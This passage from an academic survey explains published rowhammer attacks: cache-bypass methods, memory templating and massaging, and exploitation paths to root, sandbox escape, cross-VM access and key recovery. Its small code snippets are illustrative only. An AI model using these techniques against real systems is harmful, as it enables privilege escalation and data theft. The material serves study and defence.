The Glitch [58] attack is a GPU 5 based attack that needs to bypass the GPU cache in order to access DRAM directly and trigger rowhammer. They therefore need to build an efficient eviction strategy to bypass the two levels of cache. First of all, they deduce cache attributes such as cache line size, cache size, associativity, and replacement policy by running different GLSL shader programs on the GPU. They gain 4-byte-granularity access to memory with the OpenGL texture2D() function, which retrieves a pixel's data from a texture in memory. In parallel, they monitor the usage of the caches through the performance counters available from the GPU's Performance Monitoring Unit (PMU). To recover the cache line size, the shader accesses consecutive values at the smallest possible granularity (4 bytes), sequentially increasing the offset until two cache misses are encountered. The cache size is discovered by monitoring the time to access blocks of increasing size: starting from the cache line size, the block size is increased until accesses take measurably longer. The ratio between cache misses and cache requests confirms the set-associative organization of the cache. To find the associativity, they use dynamic eviction sets (S, E, P_i), where S is a set containing enough elements to fill up the cache, E initially contains a random address that is not part of S, and P_i is the set of elements to probe (P_i = S ∪ E_0). The experiment increases i until an eviction is detected, then the corresponding address is added to E and the process restarts repeatedly until P_i = E_0, when every cache line of the set has been evicted. The size of E is then the associativity, and the replacement strategy can be found by filling up the cache set and accessing the first element again before the first eviction.
                          L1    UCHE (second-level cache)
Cache line (Bytes)        16    64
Size (KBytes)             1     32
Associativity (# ways)    16    8
Replacement policy           FIFO
Inclusiveness            Non-inclusive
Table 8 GPU Two-Level Cache Summary

5 The GPU (Graphics Processing Unit) is a processor designed to handle graphics operations, with the aim of accelerating graphics rendering and image processing. An integrated GPU architecture is composed of multiple Stream Processors (SPs) that run shader GPU programs in parallel with different inputs. Each SP also incorporates multiple ALUs (Arithmetic Logic Units) to parallelize the computation. The Texture Processor (TP) provides the SPs with additional input data during execution, typically in the form of textures. Textures and vertices are stored in DRAM due to their large size. To speed up access to this data, the GPU includes a multi-level cache hierarchy, usually of 2 levels.


Furthermore, they need to build an efficient eviction strategy based on the knowledge summarized in Table 8. They manage to evict both caches by using the technique shown in Figure 20, which alternates 9 memory accesses.

Figure 20 Efficient GPU cache eviction strategy. Figure in [58]

They compare their GPU-based eviction strategy with the CPU-based native eviction strategy of Rowhammer.js on different vulnerable mobile platforms. With the Rowhammer.js eviction strategy no bit flips are triggered: the eviction of the CPU cache is too slow to trigger rowhammer bit flips. In contrast, their technique manages to flip bits remotely in less than 40 seconds.

4.2.3 Non-Temporal Store Instructions

Another approach is proposed in Non-temporal Rowhammer [47]: rowhammer is triggered with non-temporal store instructions, taking advantage of their cache-bypassing characteristic. Non-temporal instructions were introduced by CPU vendors to support cacheability control. Programmers or compilers can minimize cache pollution by using non-temporal instructions for data that is referenced just once and not again in the near future. These instructions do not cache the accessed data, bypassing the cache, and for this reason their use for triggering the rowhammer bug has been explored. Non-temporal stores may be combined in the write-combining (WC) buffer (Figure 21) to reduce DRAM accesses: when writing repeatedly to the same address, only the last write goes through to the DRAM chip. To make sure that each access goes through to DRAM, the WC buffer must be flushed; each non-temporal access is therefore followed by a cached memory access to the same address in order to evict the WC buffer. Non-temporal stores are used in memset/memcpy implementations; 4 out of 6 popular libc implementations use them. In general, there is a threshold for each implementation: if the requested size is large enough, the non-temporal store-based version is executed. They successfully triggered bit flips using the Newlib version, but other implementations such as libc failed due to the much larger latency caused by the need to move large amounts of data. Nonetheless, Newlib is used in various embedded toolchains such as the Red Hat GCC distribution and Cygwin. Notice that Google's Native Client has forbidden the use of non-temporal instructions in its Newlib port as a mitigation against rowhammer.


Figure 21 Cached and non-temporal memory accesses. Figure in [47]
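A minimal sketch of a non-temporal fill on x86-64, illustrating the mechanism described above (the function name is made up; real memset/memcpy fast paths are more elaborate):

```c
#include <assert.h>
#include <stddef.h>
#include <immintrin.h>

/* Non-temporal fill: _mm_stream_si32 (MOVNTI) writes through the
 * write-combining buffer instead of the cache hierarchy; the final
 * sfence drains the WC buffer so every store reaches DRAM. */
static void nt_fill32(int *dst, int value, size_t n)
{
    for (size_t i = 0; i < n; i++)
        _mm_stream_si32(&dst[i], value); /* bypasses the cache */
    _mm_sfence();                        /* flush the WC buffer */
}
```

Note that for hammering one fixed address, the attack in [47] additionally follows each non-temporal store with a cached access to the same address, so that the WC buffer cannot combine successive stores and every single one is forced out to the DRAM chip.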

4.2.4 DMA Access

The Direct Memory Access (DMA) feature (2.8.1) provides userland apps with the ability to access memory directly, without involving the CPU. This feature has been exploited to provide rowhammer attackers with uncached memory accesses.  The investigations under the ARM architecture (the DRAMMER [2] and RAMpage [60] attacks) use the DMA memory management mechanism as the best way of bypassing CPUs and their caches on Android systems. They use the DMA Buffer Management APIs through the ION main memory manager, which allows userland apps to access uncached memory. A deeper explanation of this method is given in the following sections (6.3.1).  The Throwhammer attack [59] uses the Remote Direct Memory Access (RDMA) feature of high-performance networking, which delivers network packets directly to RAM without involving the CPU on either the client or the server. It uses two processes, one running on a server node and one on a client node, with both nodes connected via an RDMA network. The server process allocates a large virtually contiguous buffer that is configured as a DMA buffer for the NIC 6. The client side repeatedly asks the server NIC for packets with data from the buffer at different offsets. The packets are read directly from the RDMA buffer in DRAM without being cached at the CPU, due to the Direct Memory Access feature. The ability to produce bit flips remotely on an RDMA network depends on the network performance: the number of bit flips depends on the number of packets that can be sent over the network, which corresponds to the number of times the row is forced open in DRAM. They observe bit flips when accessing memory 560,000 times in 64 ms, which requires a network that can perform roughly 9 million accesses per second. It has been proven that even regular 10 Gbps networks, as used in company or university LANs, can trigger

6 The NIC (Network Interface Card) includes a feature called zero-copy networking that makes it possible to read data directly from the main memory of one computer and write that data directly to the main memory of another computer.


bit flips remotely after just 700.7 seconds. The number of bit flips over time for different network speed configurations is presented in Figure 22.

Figure 22 Rowhammer bit flips for different network configurations. Figure in [59]
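The throughput figure quoted above can be checked with a one-line calculation (the helper name is illustrative): 560,000 accesses inside one 64 ms refresh interval correspond to 8.75 million accesses per second, i.e. on the order of the 9 million quoted:

```c
#include <assert.h>

/* Accesses per second needed to keep the row activating often enough:
 * rate = accesses / window. */
static double required_rate(double accesses, double window_seconds)
{
    return accesses / window_seconds;
}
```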

4.3 WHERE TO HAMMER

An attacker needs to be able to trigger bit flips in sensitive data in order to successfully exploit the vulnerability and implement an end-to-end attack. Table 9 summarizes the different techniques used in each attack to hammer an exploitable location.

                          Random   Sensitive Data  Memory         MMU                 Buddy      Memory
                          Hammer   Spraying        Deduplication  Paravirtualization  Allocator  Waylaying
GoogleProject0                          ✓
Non-Temporal RH                         ✓
Curious case of RH           ✓
Dedup Est Machina                                        ✓
Flip Feng Shui                                           ✓
One bit flip, one
 cloud flop                                                              ✓
DRAMMER                                                                                   ✓
SGX-Bomb                     ✓
Another Flip in the Wall                                                                               ✓
Glitch                                  ✓
Throwhammer                             ✓
RAMPAGE                                                                                   ✓
PFA                                     ✓                                                              ✓
Still Hammerable                        ✓
Nethammer                    ✓
Table 9 Where to Hammer

4.3.1 Random Hammer

The attacks in this section simply hammer different memory positions until a bit flip is found at a vulnerable location that meets the attack requirements. All of them are probabilistic approaches that rely on luck to find vulnerable bits at the desired locations.


 The Curious Case of Rowhammer [54] attack first aims to find the DRAM location that contains the sensitive data under attack (the secret exponent key), and then tries to flip bits at that specific location by triggering rowhammer. This approach is a probabilistic one and depends on how vulnerable the bank containing the secret exponent is. The probability of flipping a bit in the secret key is related to the key size and is generally low. Also, the attack is not easily reproducible on a different device because the vulnerable memory regions naturally differ per DRAM chip.  The SGX-Bomb [56] attack launches a double-sided rowhammer attack against its own enclave addresses. After each round of hammering, it reads the entire heap address range in the enclave. The SGX mechanism checks for bit flips on each address read; if it finds any flip, the memory controller locks the entire processor.  The Nethammer [62] attack sends UDP packets through a fast network to a system, without any control over where in physical memory the bit flip is induced. The attackers therefore do not know what is stored at the flipped location, and the bit flips can lead to different consequences depending on the memory they corrupt. In their experiments they achieved kernel image corruption (the system could not boot anymore, so they assume the flip happened in an inode of the file system). Furthermore, they detected bit flips in kernel modules, such as network drivers, that immediately halted the entire system. They also found bit flips in userspace libraries that crashed the running processes due to segmentation faults, and on one occasion a bit flip blocked any user from logging in to the system via SSH.

4.3.2 Physical Memory Massaging

To trigger a deterministic attack, it is indispensable to trick the victim component into storing security-sensitive data in a rowhammer-vulnerable physical page. Most attacks to date follow four steps to successfully trigger an exploitable bit flip: Memory Templating, Memory Massaging, Triggering Rowhammer, and System Abuse. Most works first find which exact memory locations are susceptible to rowhammer: a memory templating phase is run at the beginning, probing physical memory in search of flippable bits. The process starts by filling memory blocks with known data, usually 0s or 1s depending on which flip direction is going to be tested. Afterwards, the rowhammer code is triggered to find the locations of vulnerable bits, and a template containing the location of each vulnerable bit, as well as the direction of its flip, is returned. It must also be investigated which of the vulnerable bits can be exploited with respect to the targeted sensitive data. Secondly, the victim component must be tricked into storing security-sensitive data in a vulnerable physical memory page chosen by the attacker. This step is called memory massaging, and the most important techniques for it are described in this section. As soon as the sensitive data is placed in the vulnerable region, the attacker must trigger rowhammer to flip the bits in the selected sensitive data using one of the methods presented in a previous section (3.2.1). In the end, the system under attack is abused by exploiting the bit flip produced in the sensitive data.


4.3.2.1 Sensitive Data Spraying

The first strategy ever proposed for exploiting the rowhammer bug is a probabilistic one that simply sprays the memory with sensitive data, hoping that at least one copy lands on a physical memory page vulnerable to rowhammer. The attacks based on this strategy are the following:

4.3.2.1.1 Page Table Spraying

GoogleProject0 [45] [71] exploits the rowhammer bug to achieve root privilege escalation by flipping bits in page table entries (PTEs). They spray physical memory with page tables and hope that at least one of them lands on a vulnerable physical page. The aim is to trigger a bit flip in a PTE so that it points to an arbitrary physical memory location. Under the memory pressure of the sprayed physical layout, this location will probabilistically be one of the attacker-controlled page tables. This provides the attacking process with read-write access to one of its own page tables, and hence to all of physical memory. In x86-64 architectures a page table is a 4KB page containing an array of 512 PTEs, each 64 bits wide (Figure 23). The bit flip can be injected at two different locations within the PTE: in the RW bit, associated with the writable permission, or in the physical-page base address, which has a higher probability (31% chance) of success.

Figure 23 4-KByte Page Table Entry

They achieve privilege escalation by following the steps outlined below:  Memory Template: They allocate a large chunk of memory and search for locations prone to flipping by triggering their random rowhammer approach (4.1.1). They must also check whether each bit flip is exploitable; here, a bit is exploitable if it falls into the right spot in a PTE: the physical page base address field.  Memory Massaging: Next, the particular memory area is returned to the operating system. The attacker then allocates massive quantities of virtual address space to force the OS to reuse that memory for PTE allocations.  Trigger Rowhammer: They cause the bit flip using their random rowhammer attack, shifting a PTE to point into an attacker-controlled page table.  System Abusing: The process now has read/write access to one of its own page tables and can therefore obtain read/write permission over all of physical memory.
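The PTE arithmetic behind the steps above can be made concrete with a small model; this is an illustrative sketch of the x86-64 layout in Figure 23, not attack code:

```c
#include <assert.h>
#include <stdint.h>

/* Simplified x86-64 4-KByte PTE model: bit 1 is the R/W permission and
 * bits 12..51 hold the physical page base address; a page table is 512
 * such 64-bit entries, i.e. exactly one 4KB page. */
#define PTE_RW        (1ull << 1)
#define PTE_ADDR_MASK 0x000FFFFFFFFFF000ull

static uint64_t pte_frame(uint64_t pte) { return pte & PTE_ADDR_MASK; }

/* A rowhammer flip is an XOR with a single bit: flipping bit n inside
 * the address field redirects the PTE by 2^n bytes; flipping bit 1
 * toggles the write permission. */
static uint64_t flip_bit(uint64_t pte, int n) { return pte ^ (1ull << n); }
```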


4.3.2.1.2 Risk Sequence Spraying

The GoogleProject0 [45] [71] research introduces a second kind of attack, targeting the sandbox for running native (NaCl) code in Chrome. The attack aims to bypass the NaCl sandbox model, which prevents jumping into the middle of an x86 instruction. NaCl uses a validator to check that the code conforms to a subset of safe instructions before running an x86-64 executable. Indirect jumps can only target 32-byte-aligned addresses, and the flip of a bit can make the program jump out of the restricted address zone. This attack is no longer possible due to the countermeasures applied after the attack's publication: NaCl's x86 validator was modified to disallow the clflush instruction. The steps of the attack are:  Memory Massaging: They spray many copies of their instruction sequence; in fact, they fill the sandbox's dynamic code area with 250MB of indirect-jump instruction sequences.  Trigger Rowhammer: They cause bit flips using their random rowhammer attack and look for flips. The sandboxed program's code is readable, so it can be determined where each bit flip occurred and whether or how it can be exploited.  System Abusing: The bit flips make the instruction sequence unsafe: 13% of the possible flips modify the jump register number, which may then hold a non-32-byte-aligned address. Once a program can jump to an unaligned address it can escape the sandbox, because it is possible to hide unsafe x86 instructions inside safe ones [71]. The PFA attack [61] aims to inject a permanent fault into the shared T-table in the Libcript binary. The exploit recovers the AES encryption key of a victim process on the same system through the following steps.  Memory Template: The attacker looks for vulnerable memory locations, creating a profile of the physical memory before the victim process runs.
 Memory Massaging: The attacker aims to place the shared T-table, which is used by both the victim and attacker processes, into the vulnerable rows. The OS allocates the shared library to a random location in the page cache each time it is loaded, depending on concurrent memory use; the shared library is therefore reloaded several times until it is allocated at the desired address. The attacker determines the row in which the victim library is located using the row ID of its physical address and tries to locate virtual pages mapped to rows physically adjacent to the target. After that, the attacker keeps spraying blank pages into memory with mmap while checking whether their physical addresses fall into rows adjacent to the victim's.  Trigger Rowhammer: The attacker triggers double-sided rowhammer by accessing both rows adjacent to the victim, found in the previous step, to permanently flip a bit in the T-table.


 System Abusing: At this point, the attacker must apply Persistent Fault Analysis 7 to recover the AES-128 encryption key.

4.3.2.1.3 Risk Sequence Spraying Interleaved with Aggressor Rows

Another approach is presented in Non-Temporal [47]. They also aim to trigger bit flips in sandboxed code, but this time the aggressor rows must contain data instead of code: the code is read-only and cannot be accessed with non-temporal store instructions, so an aggressor data row must be physically adjacent to the victim code row. The data and code rows need to be sufficiently interleaved because the aggressor address pages are picked randomly.  Memory Massaging: To get the desired mapping they create high memory pressure using a memory-eater program that reserves most of the remaining physical frames before the NaCl process starts. The NaCl process then unmaps a random chunk of the reserved memory before allocating code; because of the high memory pressure, the code will likely be served from the unmapped chunks. This approach is repeated until half of the memory is filled with code, and the other half of the memory is filled with data at random physical frames. The remote attacker needs one or more memory-consuming NaCl modules on the same web page to create the memory pressure.  Trigger Rowhammer: They trigger their random rowhammer attack based on non-temporal instructions and look for bit flips. The sandboxed programs are readable, so it can be determined where each bit flip occurred and whether or how it can be exploited.  System Abusing: The system can be abused in the same way as described in the previous section for the GoogleProject0 [45] attack.

4.3.2.1.4 Pointer Spraying

The Glitch [58] attack leaks pointers and creates references to counterfeit objects in order to obtain an arbitrary read/write primitive.  Memory Template: They find exploitable bit flips by triggering their shader program on the GPU over the target textures. To exploit an ArrayBuffer they can use a 0-to-1 bit flip in the size field of the array, which allows the attacker to increase the size and reach the metadata of the following object. Alternatively, they can trigger a 1-to-0 bit flip inside the data pointer, which allows the attacker to pivot the pointer toward another data structure. Under these conditions, they find that a bit flip is exploitable in more than 22% of the locations within a page.  Memory Massaging: WebGL uses a specific memory pool of 2048 pages for storing textures. After releasing their target texture, they start to allocate the ArrayObjects that will contain the data to be corrupted later. They use a probabilistic

7 Persistent Fault Analysis (PFA) is a fault model that assumes a fault persists and can affect multiple rounds, bypassing Dual Module Redundancy (DMR) fault injection countermeasures. A complete persistent fault attack starts with a fault injection stage, in which the attacker injects the persistent fault before the first encryption, so that every iteration of the algorithm is computed with the faulty constant. Secondly, in the encryption stage, the attacker waits for the victim to start encrypting. Finally, in the analysis stage, the mix of correct and incorrect ciphertexts caused by the persistent fault is analyzed with PFA to recover the secret key.


approach whose success probability depends on the memory state. To land sensitive data on the vulnerable location, they first free the vulnerable texture and then trigger the JavaScript engine to request that page by allocating multiple instances of their target data.  Trigger Rowhammer: Now that their ArrayBuffer has landed on the vulnerable page, they run their shader program on the GPU again to trigger the bit flips in the ArrayBuffer's metadata. Depending on the field they hammer, size or data pointer, they gain access either to the consecutive object or to another object stored 2^n bytes away, where n is the flipped bit position (Figure 24).

Figure 24 Heap layout and exploitation. Figure in [57]

 System Abusing: They gain control over the metadata of another object with read/write permission, which allows them to corrupt the data pointer and the size of the ArrayBuffer.
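The distance claim above can be made concrete: a rowhammer flip is an XOR with a single bit, so flipping bit n of the data pointer yields an address exactly 2^n bytes away, and a 0-to-1 flip in the size field grows the ArrayBuffer by 2^n bytes (the values below are made up, not real heap addresses):

```c
#include <assert.h>
#include <stdint.h>

/* The field after a single-bit rowhammer flip at position n. */
static uint64_t after_flip(uint64_t field, int n)
{
    return field ^ (1ull << n);
}
```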

The Throwhammer attack [59] aims to corrupt a Memcached 8 hash-chain pointer h_next so that it pivots to point to a counterfeit header inside a legitimate item, following the same approach as the earlier attacks Dedup Est Machina [46] and Glitch [58].  Memory Template: They template memory to find vulnerable locations. First, they spray the entire available memory with 1MB key-value items to make sure that some items eventually border the initial 16MB RDMA buffers. Then they trigger rowhammer on the RDMA buffers remotely. Finally, they issue GET requests for the items to check which bit offsets have been corrupted and find appropriate ones to exploit; in this case, they try to land the h_next pointer of an item on a bit-flip location.  Memory Massaging: They spray the memory with items whose size maximizes the probability of corrupting the h_next pointer.  Trigger Rowhammer: They re-trigger the bit flip at the desired memory location by transmitting packets from the DRAM buffers, performing double-sided rowhammer until the target item's h_next pointer is corrupted.  System Abusing: The bit flip makes the pointer point inside another item whose key-value is under the control of the attacker. The counterfeit header inside the value area is carefully crafted to gain either a limited read or a limited write capability. Then n contiguous bytes

8 Memcached is a distributed in-memory key-value store. Clients can store and retrieve items from a server using keys, which can be any character string. A client identifies the destination server by applying a hash function to the key; there is thus no central server to consult, and the architecture is inherently scalable. It stores key/value pairs as items in memory slabs of sizes from 96 bytes to 1MB: allocated memory is broken up into 1MB chunks that are assigned to slabs. The struct _stritem structure stores the item's metadata in its first 50 bytes and the key and the value in the remaining space. Items are chained together into two lists; the second, singly linked list, identified by the h_next pointer, is traversed when looking up keys with colliding hashes [114].


are retrieved from the Memcached address space by issuing a GET request on the counterfeit item. The linked item triggers a relink operation on the next GET; by controlling the *next and *prev pointers, a limited write primitive can be obtained where *prev = next and *(next+8) = p, as long as p and n are not NULL (Figure 25).

Figure 25 Memcached Exploit. Figure in [59]

4.3.2.2 Memory Deduplication

The memory deduplication feature exposes the system to a side-channel attack due to the timing difference between writes to a shared copy and writes to a regular copy. The increased time to write to a shared copy, which results in a page fault and a subsequent page copy, can be used by an attacker to detect when a given page exists in the system. Earlier studies used this side channel just to fingerprint applications [74] or, at most, to leak a limited number of bits from a victim process [75]. In this section we describe how the memory deduplication technique, in combination with rowhammer, can provide the attacker with stronger primitives. Memory deduplication can be used to trick the OS into mapping two pages, an attacker-controlled virtual memory page and a victim-owned memory page, to the same attacker-chosen rowhammer-vulnerable position. An attacker who controls the alignment and reuse of data in memory is able to perform byte-by-byte disclosure of sensitive data. The deduplication-based primitives used in the attack depend on the alignment and reuse properties of memory [46]. Alignment probing: if the attacker can change the alignment of secret data with weak alignment properties, fewer or more bytes of the secret may be probed, and the attacker can shift the secret up and down in memory. In this way the entropy is reduced by brute-forcing the secret byte by byte using deduplication.


Figure 26 Alignment probing primitive. Figure in [46]

Partial reuse: If attacker-controlled input can partially overwrite stale secret data with predictable reuse properties, a crafted primitive allows the attacker to perform byte-by-byte probing of secret information by controlling the partial reuse pattern. Applications often reuse the same memory page and selectively overwrite the content of a reused page with new data. If secret data was previously stored in the page, the attacker can overwrite part of the secret and brute-force the remainder.

Figure 27 Partial Reuse primitive. Figure in [46]

Birthday heap spray: This primitive can leak secrets even when the attacker has no control over memory alignment or reuse. It relies on the birthday paradox: the probability that at least two people in a group share a birthday is high even for modest group sizes. On one side, the attacker forces the application to controllably spray target secrets over memory by generating S pages, each with a different secret pointer. On the other side, the attacker creates P probe pages, with P roughly the same size as S. Memory deduplication automatically tests all P probe pages against the S target secret pages, and if any of them hits, the target secret is immediately exposed.

Figure 28 Birthday heap Spray primitive. Figure in [46]
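The birthday-style hit probability can be sketched with the standard approximation; the example numbers (a 32-bit secret, 2^16 sprayed targets and probes) are assumptions chosen for illustration, not figures from [46].

```python
import math

# S target pages each hold one of N equally likely secret values;
# P probe pages each guess one value; deduplication compares every pair.
def hit_probability(S, P, N):
    # P(at least one probe matches a target) ~= 1 - exp(-S*P/N)
    return 1 - math.exp(-S * P / N)

# Example (assumed numbers): a 32-bit secret, 2**16 targets and 2**16 probes
p = hit_probability(2**16, 2**16, 2**32)
assert 0.63 < p < 0.64        # ~63% hit chance with only 2**17 pages in total
```

This is why the primitive works with "modest size groups": the product S·P, not S or P alone, has to approach the secret space N.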


4.3.2.2.1 Dedup Est Machina
The researchers of Dedup Est Machina [46] present an end-to-end remote JavaScript-based attack against the Microsoft Edge browser. They combine the new deduplication-based primitives described above with a reliable rowhammer exploit to gain arbitrary memory read and write access in the browser. The exploitation steps are:
 Memory Template: They allocate a large array filled with doubles, find eviction sets, and hammer 32 pages at a time, reading from each page 2 million times. By scanning a sufficient number of pages, they find out which bits can be flipped at which offsets.
 Memory Massaging: The target is now to place at the vulnerable memory location some data of the array which, after a bit flip, yields a reference to a controlled counterfeit object. The attack crafts a valid counterfeit object by using the alignment probing primitive to leak a code pointer into Chakra's binary and the birthday heap spray primitive to leak a heap pointer. A reference to a valid object is stored at the vulnerable location inside the large double array, carefully chosen so that, when the bit flip is triggered, the reference points to the counterfeit object.
 Trigger Rowhammer: They trigger the rowhammer vulnerability using the specified array offsets; at this step, the attacker has access to a bit flip inside a controlled array. The bit flip pivots the reference to point to the counterfeit object.

Figure 29 Flip bit exploitation: Pivot to a counterfeit object. Figure in [46]

 System Abusing: The counterfeit object provides the attacker with an arbitrary write/read primitive, from which code execution is achieved. It must be noted that, in order to trigger rowhammer from JavaScript, they reduced the DRAM refresh time, similarly to Rowhammer.js [3]. This means that, even at the moment of publication, the attack could not be reproduced under the default system configuration.

4.3.2.2.2 Flip Feng Shui (FFS)
Flip Feng Shui (FFS) [42] is an exploitation vector that induces hardware bit flips over arbitrary physical memory in a controlled fashion. The specific implementation in [42] exploits

the KSM9 and the rowhammer bug to flip bits in RSA public keys, compromising the authentication and update system of a co-hosted victim VM.
 Memory Template: Firstly, they fingerprint the hardware bit-flip patterns on the running system, determining which physical pages and offsets have vulnerable bit flips. They rely on the double-sided rowhammer implementation of [45]. The usefulness of a template depends on the direction of the bit flip, the page offset and the contents of the target victim.
 Memory Massaging: First of all, the attacker needs to predict the contents of the victim VM's page that it wants to control, then create a memory page with the same contents and place it at the vulnerable location. Then it is necessary to wait for the memory deduplication system to scan both pages, returning one of the two back to the system and using the other physical page to back both the attacker's and the victim's virtual pages. KSM scans the memory of the VMs in the order in which they have been registered, so to guarantee that the physical page used in the merge is the attacker's, the attacker VM should have been started before the victim VM. Note that KSM keeps two red-black trees, termed stable and unstable, to keep track of the merged and candidate pages respectively. This limits the attacker: just one template can be used to induce a bit flip. After the copy-on-write event, the victim's page remains in the stable tree, and subsequent attempts at memory massaging will merge onto the victim's physical page rather than an attacker-controlled location.

Figure 30 Memory deduplication for control over physical memory layout. Figure in [42]

 Trigger Rowhammer: They trigger double-sided rowhammer using Transparent Huge Pages (4.1.3).
 System Abusing: The exploitation surface depends on the ability of the attacker to reach interesting locations. An attacker running on a cloud VM can corrupt sensitive file contents in the page cache of a co-hosted victim VM in the absence of any software vulnerabilities.
o It can duplicate the public RSA key of a victim; a bit flip on it can then provide the attacker with the ability to factorize the key and break the authentication system.

9 Kernel Same-page Merging (KSM) has implemented memory deduplication in the Linux kernel since version 2.6.32 in 2009. KSM was originally intended to allow running more virtual machines on one host by sharing memory between processes as well as between virtual machines.


o It can flip bits in the source.list and trusted.gpg files of apt. The source.list file is used by Ubuntu to operate the daily updates, and the trusted.gpg file to check the authenticity of the updates via RSA. If the attacker manages to compromise apt, the attacker will be able to serve arbitrary attacker-generated packages when the victim VM downloads the files.

4.3.2.3 MMU Paravirtualization
The One Bit Flip, One Cloud Flop attack [55] leverages Xen MMU paravirtualization10 to perform, from a guest VM, a deterministic rowhammer exploitation that gains arbitrary access to memory on the host machine. This approach breaks Xen paravirtualization memory isolation and compromises the integrity and confidentiality of co-located VMs, or even of the VMM (Virtual Machine Monitor). The guest VM uses hypercalls to map page directories in the OS kernel to physical pages that contain vulnerable memory cells. The steps of the implementation of the Page Table Replacement attack are:
 Memory Template: They allocate a large chunk of memory and search for locations prone to flipping. They must also check whether the specific bit flip is exploitable; in this case, it is exploitable if it falls into the right spot in a Page Directory Entry (PDE), making the PDE point to a different Page Table. The vulnerable page is called Pv.
 Memory Massaging: First of all, the attacker VM allocates and maps one virtual memory page p. Two physical pages (p1, p2) in the guest kernel space are selected whose physical addresses differ only at the specific vulnerable bit position. The Page Table of p is copied to p1 (PT). Then, the PMD of p is copied onto the vulnerable page Pv (shadow PMD), and a hypercall to the Xen hypervisor is issued to update the PUD entry of p to the new PMD (steps 3 and 4 in Figure 31). A fake Page Table (forged PT) that points to physical pages outside the attacker VM is placed at the second physical page p2 (step 5 in Figure 31).
 Trigger Rowhammer: They cause the bit flip using a deterministic rowhammer attack on the two known neighbouring rows until a bit flip is observed. The PDE is flipped so that it points to a malicious Page Table: the shadow PMD placed at Pv (the vulnerable page) flips from pointing to p1 to pointing to p2
(step 6 in Figure 31).
 System Abusing: Now the attacker can use the 511 virtual pages controlled by the same forged Page Table to access physical memory outside their own VM. The attacker can also modify the PTEs in the forged PT without hypercalls, because they have write privilege on the specific forged page table. The attack breaks memory isolation on Xen guest VMs.
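The pivot at the heart of the attack comes down to one-bit arithmetic on the frame address stored in the page-directory entry; a toy sketch (the bit position and addresses below are invented):

```python
FLIP_BIT = 13                      # assumed vulnerable bit position in the PDE
p1 = 0x12345000                    # frame of the legitimate page table (PT)
p2 = p1 ^ (1 << FLIP_BIT)          # frame of the forged PT: differs in one bit

pde = p1                           # the shadow PMD entry initially points at p1
pde ^= (1 << FLIP_BIT)             # rowhammer-induced bit flip
assert pde == p2                   # the entry now points at the forged PT
```

This is why the two physical pages must be chosen to differ only at the vulnerable bit: the flip then deterministically redirects the entry from one to the other.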

10 Xen is an open-source type-1 bare-metal hypervisor for x86, which makes it possible to run many instances of an operating system, or indeed different operating systems, in parallel on a single machine (or host). This type of hypervisor runs directly on the host's hardware to control and manage guest operating systems. The Xen hypervisor introduced an original feature, the paravirtualization of the memory management unit (MMU).


Figure 31 Page Table replacement attack. Figure in [55]

4.3.2.4 Buddy allocator
The Linux memory allocator uses the buddy allocator strategy (2.7) to overcome external fragmentation and guarantee the possibility of allocating large blocks of contiguous memory. The allocator operates in a predictable way, always serving memory from the smallest contiguous physically available block that fits. This predictable behaviour of kernel memory allocation has been exploited in various attacks to massage the memory in diverse ways, forcing the OS to allocate sensitive data at rowhammer-vulnerable positions.
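A minimal model of this predictable behaviour follows (a sketch of the general buddy strategy, not the Linux implementation): free lists are kept per order, and a request of order k is served from the smallest free block of order ≥ k, splitting larger blocks in half on the way down.

```python
# Minimal buddy-allocator model (illustrative only)
class Buddy:
    def __init__(self, max_order):
        self.max_order = max_order
        self.free = {o: [] for o in range(max_order + 1)}
        self.free[max_order] = [0]          # one big block at address 0

    def alloc(self, order):
        o = order
        while o <= self.max_order and not self.free[o]:
            o += 1                          # smallest free block that fits
        if o > self.max_order:
            raise MemoryError("out of memory")
        addr = self.free[o].pop(0)
        while o > order:                    # split, keeping the upper buddy free
            o -= 1
            self.free[o].append(addr + (1 << o))
        return addr

b = Buddy(3)                                # 8 page-sized units in total
# Allocation addresses are fully predictable, which is what the attacks exploit:
assert [b.alloc(0), b.alloc(0), b.alloc(1)] == [0, 1, 2]
```

Because every allocation outcome is determined by the current free lists, an attacker who drives the allocator into a known state can predict exactly where the next sensitive allocation will land.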

4.3.2.4.1 Phys Feng Shui
The DRAMMER attack [2] is a deterministic rowhammer attack for ARM mobile platforms. The Phys Feng Shui technique, introduced by the DRAMMER team, exploits the predictable way in which the buddy allocator reuses and partitions memory (2.7). It aims to place the sensitive data, a page table, at a specific vulnerable location by exhausting the memory in a clever way. The buddy allocator always serves memory from the smallest contiguous physically available block that fits. The attacker can therefore exhaust the memory with large chunks and then split the one that contains the vulnerable page into multiple smaller chunks that can be released individually. After releasing the smaller chunk with the vulnerable page, spraying page tables will place a victim page table at the specific vulnerable small chunk. A deep theoretical analysis of the attack method and implementation is given in the following sections (6.4.3). Reliable root exploitation on Android/ARM follows these steps:
 Memory Template: First of all, physical memory is probed for bit flips. They use the DMA Buffer Management API (2.8.1) to access physically contiguous uncached memory from the ION_SYSTEM_CONTIGUOUS heap, and double-sided rowhammer to trigger the vulnerability. The memory template phase includes researching the exploitability of the vulnerable location. In this case, the bits that an attacker can use for the exploitation are


determined by the number of flips that have been found in potential PTE locations and by their relative location in the contiguous block.
 Memory Massaging: The Phys Feng Shui technique exhausts available memory chunks of different sizes. It drives the physical memory allocation into a state in which it has to start serving memory from reliably predictable regions. The allocator is thereby forced to place the sensitive data, a Page Table, at the vulnerable location.
 Trigger RowHammer: They trigger double-sided rowhammer at the exploitable vulnerable location and flip a bit in the PT that makes a PTE point to another PT, or even to itself.
 System Abusing: Now the attacker has write/read access to a PT, and can map different physical pages to scan kernel memory and implement a privilege escalation attack to achieve root access.
The RAMpage attack [60] for the ARM mobile platform is a modification of the DRAMMER attack that bypasses the countermeasures in the latest Android versions (4.1.3.3) (4.2.4). The only difference between them lies in the Memory Template phase. RAMpage allocates chunks using the ION SYSTEM heap with large orders that span at least 3 or more physical rows (at least 256KB). To begin with, ION's internal pools are drained. Each subsequent request for a large ION chunk will then likely be served by the buddy allocator directly with physically contiguous memory. Then, double-sided rowhammer can be triggered to find an exploitable page.

4.3.2.4.2 Memory Ambush
